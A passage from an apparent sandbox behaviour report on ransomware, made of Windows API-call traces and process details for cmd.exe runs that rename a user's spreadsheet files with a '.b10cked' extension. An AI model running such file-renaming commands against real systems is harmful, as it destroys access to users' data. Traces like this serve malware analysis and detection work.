_MaxCount=0x7) returned 38 [0131.902] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0131.902] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0131.902] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0131.902] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0131.902] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0131.902] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0131.902] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0131.902] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0131.902] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0131.902] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0131.902] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0131.902] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0131.902] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0131.903] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0131.903] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0131.903] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0131.903] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0131.903] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0131.903] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0131.903] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0131.903] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0131.903] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 
[0131.903] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0131.903] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0131.903] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0131.903] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0131.903] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0131.903] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0131.903] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0131.903] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0131.903] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0131.903] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0131.903] _wcsicmp (_String1="QFL-BV~1.XLS", _String2=".") returned 67 [0131.903] _wcsicmp (_String1="QFL-BV~1.XLS", _String2="..") returned 67 [0131.903] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\QFL-BV~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\qfl-bv~1.xls")) returned 0x20 [0131.904] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3e1d40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.904] SetErrorMode (uMode=0x0) returned 0x0 [0131.904] SetErrorMode (uMode=0x1) returned 0x0 [0131.904] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\QFL-BV~1.XLS", nBufferLength=0x104, lpBuffer=0x28f05c, lpFilePart=0x28f044 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\QFL-BV~1.XLS", lpFilePart=0x28f044*="QFL-BV~1.XLS") returned 0x26 [0131.904] SetErrorMode (uMode=0x0) returned 0x1 [0131.904] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1" (normalized: "c:\\users\\eebsym5\\docume~1")) returned 0x13 [0131.904] _wcsicmp (_String1="QFL-BV~1.XLS", _String2=".") returned 67 [0131.904] _wcsicmp (_String1="QFL-BV~1.XLS", 
_String2="..") returned 67 [0131.904] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\QFL-BV~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\qfl-bv~1.xls")) returned 0x20 [0131.904] SetErrorMode (uMode=0x0) returned 0x0 [0131.904] SetErrorMode (uMode=0x1) returned 0x0 [0131.904] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\QFL-BV~1.XLS", nBufferLength=0x104, lpBuffer=0x28f4d8, lpFilePart=0x28f270 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\QFL-BV~1.XLS", lpFilePart=0x28f270*="QFL-BV~1.XLS") returned 0x26 [0131.904] SetErrorMode (uMode=0x0) returned 0x1 [0131.905] SetErrorMode (uMode=0x0) returned 0x0 [0131.905] SetErrorMode (uMode=0x1) returned 0x0 [0131.905] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\qFL-bVPAqe.xlsx.b10cked", nBufferLength=0x104, lpBuffer=0x28f6e0, lpFilePart=0x28f270 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\qFL-bVPAqe.xlsx.b10cked", lpFilePart=0x28f270*="qFL-bVPAqe.xlsx.b10cked") returned 0x31 [0131.905] SetErrorMode (uMode=0x0) returned 0x1 [0131.905] SetLastError (dwErrCode=0x0) [0131.905] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\qFL-bVPAqe.xlsx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\qfl-bvpaqe.xlsx.b10cked")) returned 0xffffffff [0131.905] GetLastError () returned 0x2 [0131.905] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\QFL-BV~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x28ebec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28ebec) returned 0x3d0f08 [0131.905] FindNextFileW (in: hFindFile=0x3d0f08, lpFindFileData=0x28ebec | out: lpFindFileData=0x28ebec) returned 0 [0131.906] GetLastError () returned 0x12 [0131.906] FindClose (in: hFindFile=0x3d0f08 | out: hFindFile=0x3d0f08) returned 1 [0131.907] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\QFL-BV~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x3e1ae0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: 
lpFindFileData=0x3e1ae0) returned 0x3d0f08 [0131.907] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\qFL-bVPAqe.xlsx.b10cked", nBufferLength=0x104, lpBuffer=0x28ee84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\qFL-bVPAqe.xlsx.b10cked", lpFilePart=0x0) returned 0x31 [0132.047] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\qFL-bVPAqe.xlsx", nBufferLength=0x104, lpBuffer=0x28ee84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\qFL-bVPAqe.xlsx", lpFilePart=0x0) returned 0x29 [0132.047] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\qFL-bVPAqe.xlsx" (normalized: "c:\\users\\eebsym5\\docume~1\\qfl-bvpaqe.xlsx")) returned 0x20 [0132.048] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\qFL-bVPAqe.xlsx" (normalized: "c:\\users\\eebsym5\\docume~1\\qfl-bvpaqe.xlsx"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\qFL-bVPAqe.xlsx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\qfl-bvpaqe.xlsx.b10cked"), dwFlags=0x3) returned 1 [0132.048] FindClose (in: hFindFile=0x3d0f08 | out: hFindFile=0x3d0f08) returned 1 [0132.048] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x28ee38 | out: _Buffer=" 1") returned 9 [0132.048] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.048] GetFileType (hFile=0x7) returned 0x2 [0132.048] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0132.048] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28edc4 | out: lpMode=0x28edc4) returned 1 [0132.048] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.049] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x28edf8 | out: lpConsoleScreenBufferInfo=0x28edf8) returned 1 [0132.049] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0132.049] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, 
dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x28ee38 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0132.049] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x28ee1c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28ee1c*=0x1a) returned 1 [0132.049] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.049] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0132.049] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.049] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0132.050] _get_osfhandle (_FileHandle=0) returned 0x3 [0132.050] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0132.050] SetConsoleInputExeNameW () returned 0x1 [0132.050] GetConsoleOutputCP () returned 0x1b5 [0132.050] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0132.050] SetThreadUILanguage (LangId=0x0) returned 0x409 [0132.050] exit (_Code=0) Process: id = "109" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16900" os_pid = "0xa74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5DDJXD~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5d djXdWwSLPL XJ.xls.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT 
AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11958 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11959 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11960 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11961 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 11962 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 11963 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11964 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11965 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 11966 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 11967 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 12123 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12124 start_va = 0x20000 end_va = 0x2ffff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12125 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12126 start_va = 0xd0000 end_va = 0xdffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 12127 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 12128 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 12129 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12130 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 12131 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12132 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12133 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 
12134 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 12135 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12136 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 12137 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 12138 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12139 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 12140 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 12141 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 12142 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 12143 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 12144 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 12145 start_va = 0x560000 
end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 12146 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Thread: id = 166 os_tid = 0x958 [0131.715] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fc4c | out: lpSystemTimeAsFileTime=0x26fc4c*(dwLowDateTime=0x8870af60, dwHighDateTime=0x1d440a9)) [0131.715] GetCurrentProcessId () returned 0xa74 [0131.715] GetCurrentThreadId () returned 0x958 [0131.715] GetTickCount () returned 0x29f69 [0131.715] QueryPerformanceCounter (in: lpPerformanceCount=0x26fc44 | out: lpPerformanceCount=0x26fc44*=18850384386) returned 1 [0131.715] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0131.715] __set_app_type (_Type=0x1) [0131.715] __p__fmode () returned 0x76b331f4 [0131.715] __p__commode () returned 0x76b331fc [0131.715] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0131.716] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0131.716] GetCurrentThreadId () returned 0x958 [0131.716] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x958) returned 0x38 [0131.716] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0131.716] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0131.716] SetThreadUILanguage (LangId=0x0) returned 0x409 [0131.716] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0131.716] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fbdc | out: phkResult=0x26fbdc*=0x0) returned 0x2 [0131.716] VirtualQuery (in: lpAddress=0x26fc13, 
lpBuffer=0x26fbac, dwLength=0x1c | out: lpBuffer=0x26fbac*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0131.716] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26fbac, dwLength=0x1c | out: lpBuffer=0x26fbac*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0131.716] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fbac, dwLength=0x1c | out: lpBuffer=0x26fbac*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0131.716] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26fbac, dwLength=0x1c | out: lpBuffer=0x26fbac*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0131.716] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fbac, dwLength=0x1c | out: lpBuffer=0x26fbac*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0131.716] GetConsoleOutputCP () returned 0x1b5 [0131.716] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0131.716] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0131.717] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.717] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0131.717] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.717] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0131.717] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.717] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0131.717] _get_osfhandle (_FileHandle=0) returned 0x3 [0131.717] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: 
lpMode=0x4a9e41b0) returned 1 [0131.717] _get_osfhandle (_FileHandle=0) returned 0x3 [0131.717] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0131.717] GetEnvironmentStringsW () returned 0x3601d8* [0131.718] FreeEnvironmentStringsW (penv=0x3601d8) returned 1 [0131.718] GetEnvironmentStringsW () returned 0x3601d8* [0131.718] FreeEnvironmentStringsW (penv=0x3601d8) returned 1 [0131.718] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26eb4c | out: phkResult=0x26eb4c*=0x40) returned 0x0 [0131.718] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26eb54, lpData=0x26eb58, lpcbData=0x26eb50*=0x1000 | out: lpType=0x26eb54*=0x0, lpData=0x26eb58*=0x0, lpcbData=0x26eb50*=0x1000) returned 0x2 [0131.718] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26eb54, lpData=0x26eb58, lpcbData=0x26eb50*=0x1000 | out: lpType=0x26eb54*=0x4, lpData=0x26eb58*=0x1, lpcbData=0x26eb50*=0x4) returned 0x0 [0131.718] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26eb54, lpData=0x26eb58, lpcbData=0x26eb50*=0x1000 | out: lpType=0x26eb54*=0x0, lpData=0x26eb58*=0x1, lpcbData=0x26eb50*=0x1000) returned 0x2 [0131.718] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26eb54, lpData=0x26eb58, lpcbData=0x26eb50*=0x1000 | out: lpType=0x26eb54*=0x4, lpData=0x26eb58*=0x0, lpcbData=0x26eb50*=0x4) returned 0x0 [0131.718] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26eb54, lpData=0x26eb58, lpcbData=0x26eb50*=0x1000 | out: lpType=0x26eb54*=0x4, lpData=0x26eb58*=0x40, lpcbData=0x26eb50*=0x4) returned 0x0 [0131.718] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26eb54, lpData=0x26eb58, lpcbData=0x26eb50*=0x1000 | out: lpType=0x26eb54*=0x4, lpData=0x26eb58*=0x40, 
lpcbData=0x26eb50*=0x4) returned 0x0 [0131.718] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26eb54, lpData=0x26eb58, lpcbData=0x26eb50*=0x1000 | out: lpType=0x26eb54*=0x0, lpData=0x26eb58*=0x40, lpcbData=0x26eb50*=0x1000) returned 0x2 [0131.718] RegCloseKey (hKey=0x40) returned 0x0 [0131.718] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26eb4c | out: phkResult=0x26eb4c*=0x40) returned 0x0 [0131.718] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26eb54, lpData=0x26eb58, lpcbData=0x26eb50*=0x1000 | out: lpType=0x26eb54*=0x0, lpData=0x26eb58*=0x40, lpcbData=0x26eb50*=0x1000) returned 0x2 [0131.718] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26eb54, lpData=0x26eb58, lpcbData=0x26eb50*=0x1000 | out: lpType=0x26eb54*=0x4, lpData=0x26eb58*=0x1, lpcbData=0x26eb50*=0x4) returned 0x0 [0131.719] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26eb54, lpData=0x26eb58, lpcbData=0x26eb50*=0x1000 | out: lpType=0x26eb54*=0x0, lpData=0x26eb58*=0x1, lpcbData=0x26eb50*=0x1000) returned 0x2 [0131.719] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26eb54, lpData=0x26eb58, lpcbData=0x26eb50*=0x1000 | out: lpType=0x26eb54*=0x4, lpData=0x26eb58*=0x0, lpcbData=0x26eb50*=0x4) returned 0x0 [0131.719] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26eb54, lpData=0x26eb58, lpcbData=0x26eb50*=0x1000 | out: lpType=0x26eb54*=0x4, lpData=0x26eb58*=0x9, lpcbData=0x26eb50*=0x4) returned 0x0 [0131.719] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26eb54, lpData=0x26eb58, lpcbData=0x26eb50*=0x1000 | out: lpType=0x26eb54*=0x4, lpData=0x26eb58*=0x9, lpcbData=0x26eb50*=0x4) returned 0x0 [0131.719] RegQueryValueExW (in: 
hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26eb54, lpData=0x26eb58, lpcbData=0x26eb50*=0x1000 | out: lpType=0x26eb54*=0x0, lpData=0x26eb58*=0x9, lpcbData=0x26eb50*=0x1000) returned 0x2 [0131.719] RegCloseKey (hKey=0x40) returned 0x0 [0131.719] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886366 [0131.719] srand (_Seed=0x5b886366) [0131.719] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5DDJXD~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5d djXdWwSLPL XJ.xls.b10cked\"" [0131.719] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5DDJXD~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5d djXdWwSLPL XJ.xls.b10cked\"" [0131.719] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.719] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x361938, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0131.719] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0131.719] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0131.719] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0131.720] 